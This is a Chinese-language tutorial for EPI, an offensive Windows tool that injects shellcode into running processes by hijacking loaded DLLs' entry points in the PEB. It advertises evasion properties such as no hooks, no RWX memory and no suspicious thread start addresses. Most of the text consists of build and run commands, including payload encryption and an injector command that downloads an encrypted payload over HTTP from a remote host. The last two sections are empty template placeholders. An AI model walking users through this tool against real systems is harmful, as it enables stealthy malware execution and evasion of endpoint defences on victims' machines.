EPI 项目使用与启动教程

1. 项目介绍

EPI（Entry Point Injection）是一个利用新的无线程进程注入技术，通过劫持已加载的 DLL 文件的入口点来实现进程注入的工具。该工具通过修改目标进程的 PEB（Process Environment Block），使得已加载的 DLL 文件的入口点被重定向到注入的壳代码（默认情况下是转换为 sRDI 的 Loader）。当进程自然创建新线程或线程退出时，所有已加载模块的入口点都会被调用，包括我们的注入壳代码。

EPI 的主要优势包括：

• 支持无线程或有线程执行模式。
• 不进行钩子操作（即不对 RX 内存区域进行 JMP 或 CALL 指令的修补）。
• 在已知 DLL 的 RX 内存页上不生成私有内存区域。
• 不需要 RWX 内存权限。
• 目标进程可以继续其常规执行。
• 没有新线程的起始地址指向我们的壳代码。

2. 项目快速启动

环境准备

在编译前，需要设置 LITCRYPT 加密密钥环境变量。打开命令行，执行以下命令：

set LITCRYPT_ENCRYPT_KEY="setarandomkeyeachtime"

编译项目

使用工具默认配置

编译 EPI 项目：

cargo build --release

编译完成后，运行工具：

epi.exe -h

无 Loader - 自定义 payload

如果你希望直接执行自定义的壳代码而不使用 Loader（强烈不推荐），运行 builder.py 脚本并指定 payload 文件的完整路径：

python3 builder.py -p c:\path\to\payload.bin

然后运行 epi.exe：

epi.exe -h

使用 Loader 和自定义 payload

这是推荐的用法，因为它允许你以最可靠的方式完全自定义执行。要构建工具，运行 builder.py 脚本并使用 -l 标志指示使用 Loader。如果你想要在 Loader 中启用间接系统调用，可以使用 -i 标志。

python3 builder.py -l -p c:\path\to\payload.bin [-i]

编译完成后，注入器即可使用：

epi.exe -p <PID> [flags]

如果你不想在最终二进制中嵌入最终的 PIC 代码，可以加密它（使用简单的 XOR 加密），通过 -d 标志传递给 builder.py，然后通过 HTTP 直接下载到注入器进程内存中。

python3 builder.py -l -p c:\path\to\payload.bin -d [-i]

加密后的 payload 将被写入 payload 目录。加密密钥与 LITCRYPT_ENCRYPT_KEY 环境变量相同。这个值必须传递给 epi.exe 才能在运行时解密 payload：

epi.exe -p <PID> -u http://remoteip/payload.bin -k setarandomkeyeachtime [flags]

基本使用

传递目标进程的 PID 给工具，并等待线程的创建或退出：

epi.exe -p 1337

如果需要启用 DEBUG 权限以进行注入，可以使用 -d 标志。启用注入器的间接系统调用也可以通过 -i 标志实现。

epi.exe -p 1337 -d -i

如果你不想等待自然创建新线程，可以使用 -f 标志强制创建一个新线程。

epi.exe -p 1337 -f

最后，可以通过发送 WM_QUIT 消息到目标进程的所有线程来强制执行注入的壳代码。

epi.exe -p 1337 -s

3. 应用案例和最佳实践

（此处可以添加具体的应用案例和最佳实践，例如如何在特定场景下使用 EPI，如何调整配置以适应不同的需求等。）

4. 典型生态项目

（此处可以介绍与 EPI 相关的生态项目，例如其他进程注入工具、安全防护工具等，以及如何将它们与 EPI 结合使用。）